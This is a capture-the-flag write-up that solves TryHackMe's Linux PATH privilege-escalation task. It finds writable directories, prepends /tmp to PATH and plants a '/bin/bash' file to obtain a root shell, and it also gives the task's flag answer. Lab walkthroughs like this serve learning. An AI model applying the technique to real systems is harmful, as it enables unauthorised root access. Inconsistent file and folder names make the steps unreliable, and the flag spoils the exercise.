This article discusses the solution for TryHackMe's Linux Privilege Escalation PATH task so proceed with caution.
I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.
Privilege Escalation PATH
Notes:
exploiting path folders which we have write access to.
see if you have write access to PATH so you can add folders where you have write access to.
binaries run in path are usually run under root privileges.
copy binary in the folder indicated in path then run a binary containing "/bin/bash" to create a root enabled shell.
What is the odd folder you have write access for?
- Run the following command to find write acccess for your user.
find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
Running it doesn't provide the answer we need let's go 1 level deeper:
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
Answer: home/murdock
What is the content of the flag6.txt file?
- First run the following to see the path:
echo $PATH
- Let's see if we have any write permissions in any of the $PATH directories.
find / -writable 2>/dev/null | cut -d "/" -f 2,3,4 | grep usr | sort -u
Unfortunately the writable usr/lib/systemd is not included in the path.
We will append /tmp in the PATH by running the following command:
export PATH=/tmp:$PATH
- Execute the following command:
cd /tmp
echo "/bin/bash" > thm
chmod 777 thm
- Execute the following which will grant you a root access bash terminal
cd /home/murdoch/
/.test
Execute
cat /home/matt/flag6.txt
Answer: THM-736628929
Until next time. Keep learning.
Stay stoked and code. :)
I hope you can voluntarilyBuy Me A Coffeeif you found this article useful and give additional support for me to continue sharing more content for the community. :)
Thank you very much. :)